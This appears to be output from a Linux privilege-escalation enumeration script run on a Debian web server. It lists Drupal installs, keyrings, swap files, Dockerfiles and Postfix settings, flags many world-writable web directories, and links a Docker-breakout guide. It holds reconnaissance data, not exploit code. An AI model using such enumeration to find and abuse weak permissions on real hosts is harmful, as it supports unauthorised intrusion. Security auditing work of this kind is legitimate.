drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lrza/vendor/pear/archive_tar/.github
drwxr-xr-x 3 daoud daoud 4096 Oct 11  2022 /home/daoud/lrza/vendor/twig/twig/.github
drwxr-xr-x 3 www-data www-data 4096 May 11  2022 /opt/phpMyAdmin/vendor/paragonie/sodium_compat/.github
drwxrwxrwx 3 www-data www-data 4096 Feb 12  2023 /srv/web/drupal-10.0.0/vendor/composer/installers/.github
drwxrwxrwx 3 www-data www-data 4096 Feb 12  2023 /srv/web/drupal-10.0.0/vendor/pear/archive_tar/.github
drwxrwxrwx 3 www-data www-data 4096 Feb 12  2023 /srv/web/drupal-10.0.0/vendor/twig/twig/.github
drwxrwxrwx 3 www-data www-data 4096 Feb 12  2023 /srv/web/drupal-10.0.2/vendor/composer/installers/.github
drwxrwxrwx 3 www-data www-data 4096 Feb 12  2023 /srv/web/drupal-10.0.2/vendor/pear/archive_tar/.github
drwxrwxrwx 3 www-data www-data 4096 Feb 12  2023 /srv/web/drupal-9.4.10/vendor/composer/installers/.github
drwxrwxrwx 3 www-data www-data 4096 Feb 12  2023 /srv/web/drupal-9.4.10/vendor/doctrine/reflection/.github
drwxrwxrwx 3 www-data www-data 4096 Feb 12  2023 /srv/web/drupal-9.4.10/vendor/guzzlehttp/psr7/.github
drwxrwxrwx 3 www-data www-data 4096 Feb 12  2023 /srv/web/drupal-9.4.10/vendor/pear/archive_tar/.github
drwxrwxrwx 3 www-data www-data 4096 Feb 12  2023 /srv/web/drupal-9.4.10/vendor/twig/twig/.github
drwxrwxrwx 3 www-data www-data 4096 Feb 12  2023 /srv/web/drupal-9.5.0/vendor/composer/installers/.github
drwxrwxrwx 3 www-data www-data 4096 Feb 12  2023 /srv/web/drupal-9.5.0/vendor/doctrine/reflection/.github
drwxrwxrwx 3 www-data www-data 4096 Feb 12  2023 /srv/web/drupal-9.5.0/vendor/guzzlehttp/psr7/.github




╔══════════╣ Analyzing PGP-GPG Files (limit 70)
gpg Not Found
netpgpkeys Not Found
netpgp Not Found

-rw-r--r-- 1 root root 8700 Mar 18  2023 /etc/apt/trusted.gpg.d/debian-archive-bookworm-automatic.gpg
-rw-r--r-- 1 root root 8709 Mar 18  2023 /etc/apt/trusted.gpg.d/debian-archive-bookworm-security-automatic.gpg
-rw-r--r-- 1 root root 280 Mar 18  2023 /etc/apt/trusted.gpg.d/debian-archive-bookworm-stable.gpg
-rw-r--r-- 1 root root 8700 Feb 25  2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-automatic.gpg
-rw-r--r-- 1 root root 8709 Feb 25  2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-security-automatic.gpg
-rw-r--r-- 1 root root 2453 Feb 25  2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-stable.gpg
-rw-r--r-- 1 root root 8132 Feb 25  2021 /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Feb 25  2021 /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Feb 25  2021 /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 1769 Jan 16  2023 /usr/share/keyrings/deb.sury.org-php.gpg
-rw-r--r-- 1 root root 8700 Mar 18  2023 /usr/share/keyrings/debian-archive-bookworm-automatic.gpg
-rw-r--r-- 1 root root 8709 Mar 18  2023 /usr/share/keyrings/debian-archive-bookworm-security-automatic.gpg
-rw-r--r-- 1 root root 280 Mar 18  2023 /usr/share/keyrings/debian-archive-bookworm-stable.gpg
-rw-r--r-- 1 root root 8700 Mar 18  2023 /usr/share/keyrings/debian-archive-bullseye-automatic.gpg
-rw-r--r-- 1 root root 8709 Mar 18  2023 /usr/share/keyrings/debian-archive-bullseye-security-automatic.gpg
-rw-r--r-- 1 root root 2453 Mar 18  2023 /usr/share/keyrings/debian-archive-bullseye-stable.gpg
-rw-r--r-- 1 root root 8132 Mar 18  2023 /usr/share/keyrings/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Mar 18  2023 /usr/share/keyrings/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Mar 18  2023 /usr/share/keyrings/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 56156 Mar 18  2023 /usr/share/keyrings/debian-archive-keyring.gpg
-rw-r--r-- 1 root root 54031 Mar 18  2023 /usr/share/keyrings/debian-archive-removed-keys.gpg


╔══════════╣ Analyzing Cache Vi Files (limit 70)
-rw-r--r-- 1 root root 0 Dec 15  2022 /home/daoud/drupal-10.0.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rw-r--r-- 1 root root 0 Dec 15  2022 /home/daoud/drupal-10.0.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-10.0.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-10.0.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-9.4.10/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-9.4.10/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rw-r--r-- 1 root root 0 Dec 15  2022 /home/daoud/drupal-9.5.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rw-r--r-- 1 root root 0 Dec 15  2022 /home/daoud/drupal-9.5.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-9.5.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-9.5.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lbcm/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lbcm/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lbpo/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lbpo/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/ldb/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/ldb/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lee/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lee/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/leve/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/leve/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lobem/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lobem/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lrza/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lrza/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-10.0.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-10.0.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-10.0.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-10.0.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-9.4.10/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-9.4.10/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-9.5.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-9.5.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-9.5.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-9.5.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/lbcm-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/lbcm-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/lbcm/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/lbcm/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/lbcm/drupal-9.5.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/lbcm/drupal-9.5.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/lbcm9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/lbcm9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/lbpo-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/lbpo-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lbpo-error/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lbpo-error/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lbpo/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lbpo/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lbpo9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lbpo9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/ldb/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/ldb/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/ldb9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/ldb9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 www-data www-data 0 Mar  2  2023 /srv/web/lee/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 www-data www-data 0 Mar  2  2023 /srv/web/lee/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 root root 0 Feb 21  2023 /srv/web/lee26-2-23/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 root root 0 Feb 21  2023 /srv/web/lee26-2-23/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 root root 0 Feb 26  2023 /srv/web/lee9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 root root 0 Feb 26  2023 /srv/web/lee9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 www-data www-data 0 Mar  2  2023 /srv/web/lee9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 www-data www-data 0 Mar  2  2023 /srv/web/lee9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 root root 0 Feb 19  2023 /srv/web/leve-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 root root 0 Feb 19  2023 /srv/web/leve-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/leve-9-4-8/ldb-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/leve-9-4-8/ldb-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/leve-9-4-8/ldb-9-4-8/leve/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/leve-9-4-8/ldb-9-4-8/leve/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp
-rwxr-xr-x 1 www-data www-data 0 Mar  1  2023 /srv/web/leve/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.swp
-rwxr-xr-x 1 www-data www-data 0 Mar  1  2023 /srv/web/leve/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.swp


╔══════════╣ Searching docker files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
-rw-r--r-- 1 root root 387 Jun 20  2022 /home/daoud/drupal-9.4.10/vendor/guzzlehttp/guzzle/Dockerfile
-rw-r--r-- 1 root root 387 Jun 20  2022 /home/daoud/drupal-9.5.0/vendor/guzzlehttp/guzzle/Dockerfile
-rw-r--r-- 1 root root 387 Jun 20  2022 /home/daoud/drupal-9.5.2/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 daoud daoud 387 Oct 11  2022 /home/daoud/lbcm/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 daoud daoud 387 Oct 11  2022 /home/daoud/lbpo/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 daoud daoud 387 Oct 11  2022 /home/daoud/ldb/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 daoud daoud 387 Oct 11  2022 /home/daoud/lee/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 daoud daoud 387 Oct 11  2022 /home/daoud/leve/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 daoud daoud 387 Oct 11  2022 /home/daoud/lobem/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 daoud daoud 387 Oct 11  2022 /home/daoud/lrza/vendor/guzzlehttp/guzzle/Dockerfile
-rwxrwxrwx 1 www-data www-data 387 Feb 12  2023 /srv/web/drupal-9.4.10/vendor/guzzlehttp/guzzle/Dockerfile
-rwxrwxrwx 1 www-data www-data 387 Feb 12  2023 /srv/web/drupal-9.5.0/vendor/guzzlehttp/guzzle/Dockerfile
-rwxrwxrwx 1 www-data www-data 387 Feb 12  2023 /srv/web/drupal-9.5.2/vendor/guzzlehttp/guzzle/Dockerfile
-rwxrwxrwx 1 www-data www-data 387 Oct 11  2022 /srv/web/lbcm-9-4-8/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Feb 21  2023 /srv/web/lbcm/drupal-9.5.0/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Feb 21  2023 /srv/web/lbcm/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Feb 21  2023 /srv/web/lbcm9-5-0/vendor/guzzlehttp/guzzle/Dockerfile
-rwxrwxrwx 1 www-data www-data 387 Oct 11  2022 /srv/web/lbpo-9-4-8/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Feb 26  2023 /srv/web/lbpo-error/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Feb 26  2023 /srv/web/lbpo/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Feb 26  2023 /srv/web/lbpo9-5-0/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Feb 21  2023 /srv/web/ldb/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Feb 21  2023 /srv/web/ldb9-5-0/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Mar  2  2023 /srv/web/lee/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 root root 387 Feb 21  2023 /srv/web/lee26-2-23/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 root root 387 Feb 26  2023 /srv/web/lee9-4-8/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Mar  2  2023 /srv/web/lee9-5-0/vendor/guzzlehttp/guzzle/Dockerfile
-rwxrwxrwx 1 www-data www-data 387 Oct 11  2022 /srv/web/leve-9-4-8/ldb-9-4-8/leve/vendor/guzzlehttp/guzzle/Dockerfile
-rwxrwxrwx 1 www-data www-data 387 Oct 11  2022 /srv/web/leve-9-4-8/ldb-9-4-8/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 root root 387 Feb 19  2023 /srv/web/leve-9-4-8/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Mar  1  2023 /srv/web/leve/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 root root 387 Feb 20  2023 /srv/web/leve9-4-8/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Feb 28  2023 /srv/web/leve9-5-0/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 root root 387 Feb 26  2023 /srv/web/lobem/vendor/guzzlehttp/guzzle/Dockerfile
-rwxrwxrwx 1 www-data www-data 387 Oct 11  2022 /srv/web/lrza-9-4-8/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Feb 26  2023 /srv/web/lrza/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Feb 19  2023 /srv/web/lrza9-4-10/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Feb 26  2023 /srv/web/lrza9-5-0/vendor/guzzlehttp/guzzle/Dockerfile


╔══════════╣ Analyzing Postfix Files (limit 70)
-rwxr-xr-x 1 root root 3368 Aug  2  2020 /etc/init.d/postfix

-rw-r--r-- 1 root root 30 May  4  2021 /etc/insserv.conf.d/postfix

-rwxr-xr-x 1 root root 800 May  4  2021 /etc/network/if-down.d/postfix

-rwxr-xr-x 1 root root 1183 Oct 12  2022 /etc/network/if-up.d/postfix

drwxr-xr-x 5 root root 4096 May  2  2023 /etc/postfix
-rw-r--r-- 1 root root 6247 Aug 16  2021 /etc/postfix/master.cf
  flags=DRXhu user=vmail argv=/usr/bin/maildrop -d ${recipient}
#  flags=DRX user=cyrus argv=/cyrus/bin/deliver -e -r ${sender} -m ${extension} ${user}
#  flags=R user=cyrus argv=/cyrus/bin/deliver -e -m ${extension} ${user}
  flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)
  flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient)
  flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t$nexthop -f$sender $recipient
  flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension}
  flags=FRX user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py ${nexthop} ${user}

-rwxr-xr-x 1 root root 800 May  4  2021 /etc/ppp/ip-down.d/postfix

-rwxr-xr-x 1 root root 1183 Oct 12  2022 /etc/ppp/ip-up.d/postfix

-rwxr-xr-x 1 root root 439 May  4  2021 /etc/resolvconf/update-libc.d/postfix

-rw-r--r-- 1 root root 361 May  4  2021 /etc/ufw/applications.d/postfix

drwxr-xr-x 3 root root 4096 May  2  2023 /usr/lib/postfix

-rwxr-xr-x 1 root root 18504 Jan 22  2023 /usr/sbin/postfix

-rw-r--r-- 1 root root 761 Aug 12  2020 /usr/share/bash-completion/completions/postfix

drwxr-xr-x 2 root root 4096 May  2  2023 /usr/share/doc/postfix

-rw-r--r-- 1 root root 166 Jan 22  2023 /usr/share/lintian/overrides/postfix

drwxr-xr-x 2 root root 4096 May  2  2023 /usr/share/postfix

drwxr-xr-x 2 postfix postfix 4096 Jan  3  2023 /var/lib/postfix

drwxr-xr-x 20 root root 4096 May  2  2023 /var/spool/postfix


╔══════════╣ Analyzing FTP Files (limit 70)



-rw-r--r-- 1 root root 69 Jan 13  2023 /etc/php/8.1/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Jan 13  2023 /etc/php/8.2/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Jan 13  2023 /usr/share/php8.1-common/common/ftp.ini
-rw-r--r-- 1 root root 69 Jan 13  2023 /usr/share/php8.2-common/common/ftp.ini






╔══════════╣ Analyzing DNS Files (limit 70)
-rw-r--r-- 1 root root 826 Aug 12  2020 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 826 Aug 12  2020 /usr/share/bash-completion/completions/bind




╔══════════╣ Analyzing Windows Files (limit 70)






















lrwxrwxrwx 1 root root 22 Jan 19  2023 /etc/alternatives/my.cnf -> /etc/mysql/mariadb.cnf
lrwxrwxrwx 1 root root 24 Jan 19  2023 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf

























-rw-r--r-- 1 root root 4039 Dec 15  2022 /home/daoud/drupal-10.0.0/core/assets/scaffold/files/web.config
-rw-r--r-- 1 root root 0 Dec 15  2022 /home/daoud/drupal-10.0.0/core/modules/system/tests/fixtures/HtaccessTest/web.config
-rw-r--r-- 1 root root 93 Dec 15  2022 /home/daoud/drupal-10.0.0/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/web.config
-r--r--r-- 1 root root 139 Dec 15  2022 /home/daoud/drupal-10.0.0/vendor/web.config
-rw-r--r-- 1 root root 4039 Dec 15  2022 /home/daoud/drupal-10.0.0/web.config
-rw-r--r-- 1 root root 4039 Jan 18  2023 /home/daoud/drupal-10.0.2/core/assets/scaffold/files/web.config
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-10.0.2/core/modules/system/tests/fixtures/HtaccessTest/web.config
-rw-r--r-- 1 root root 93 Jan 18  2023 /home/daoud/drupal-10.0.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/web.config
-r--r--r-- 1 root root 139 Jan 18  2023 /home/daoud/drupal-10.0.2/vendor/web.config
-rw-r--r-- 1 root root 4039 Jan 18  2023 /home/daoud/drupal-10.0.2/web.config
-rw-r--r-- 1 root root 4016 Jan 18  2023 /home/daoud/drupal-9.4.10/core/assets/scaffold/files/web.config
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-9.4.10/core/modules/system/tests/fixtures/HtaccessTest/web.config
-rw-r--r-- 1 root root 93 Jan 18  2023 /home/daoud/drupal-9.4.10/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/web.config
-r--r--r-- 1 root root 139 Jan 18  2023 /home/daoud/drupal-9.4.10/vendor/web.config
-rw-r--r-- 1 root root 4016 Jan 18  2023 /home/daoud/drupal-9.4.10/web.config
-rw-r--r-- 1 root root 4039 Dec 15  2022 /home/daoud/drupal-9.5.0/core/assets/scaffold/files/web.config
-rw-r--r-- 1 root root 0 Dec 15  2022 /home/daoud/drupal-9.5.0/core/modules/system/tests/fixtures/HtaccessTest/web.config
-rw-r--r-- 1 root root 93 Dec 15  2022 /home/daoud/drupal-9.5.0/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/web.config
-r--r--r-- 1 root root 139 Dec 15  2022 /home/daoud/drupal-9.5.0/vendor/web.config
-rw-r--r-- 1 root root 4039 Dec 15  2022 /home/daoud/drupal-9.5.0/web.config
-rw-r--r-- 1 root root 4039 Jan 18  2023 /home/daoud/drupal-9.5.2/core/assets/scaffold/files/web.config
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-9.5.2/core/modules/system/tests/fixtures/HtaccessTest/web.config
-rw-r--r-- 1 root root 93 Jan 18  2023 /home/daoud/drupal-9.5.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/web.config
-r--r--r-- 1 root root 139 Jan 18  2023 /home/daoud/drupal-9.5.2/vendor/web.config
-rw-r--r-- 1 root root 4039 Jan 18  2023 /home/daoud/drupal-9.5.2/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/lbcm/core/assets/scaffold/files/web.config
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lbcm/core/modules/system/tests/fixtures/HtaccessTest/web.config
-rwxr-xr-x 1 daoud daoud 93 Oct 11  2022 /home/daoud/lbcm/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/web.config
-rwxr-xr-x 1 daoud daoud 139 Oct 11  2022 /home/daoud/lbcm/vendor/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/lbcm/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/lbpo/core/assets/scaffold/files/web.config
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lbpo/core/modules/system/tests/fixtures/HtaccessTest/web.config
-rwxr-xr-x 1 daoud daoud 93 Oct 11  2022 /home/daoud/lbpo/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/web.config
-rwxr-xr-x 1 daoud daoud 139 Oct 11  2022 /home/daoud/lbpo/vendor/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/lbpo/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/ldb/core/assets/scaffold/files/web.config
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/ldb/core/modules/system/tests/fixtures/HtaccessTest/web.config
-rwxr-xr-x 1 daoud daoud 93 Oct 11  2022 /home/daoud/ldb/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/web.config
-rwxr-xr-x 1 daoud daoud 139 Oct 11  2022 /home/daoud/ldb/vendor/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/ldb/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/lee/core/assets/scaffold/files/web.config
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lee/core/modules/system/tests/fixtures/HtaccessTest/web.config
-rwxr-xr-x 1 daoud daoud 93 Oct 11  2022 /home/daoud/lee/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/web.config
-rwxr-xr-x 1 daoud daoud 139 Oct 11  2022 /home/daoud/lee/vendor/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/lee/web.config
-rwxr-xr-x 1 daoud daoud 4016 Oct 11  2022 /home/daoud/leve/core/assets/scaffold/files/web.config
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/leve/core/modules/system/tests/fixtures/HtaccessTest/web.config
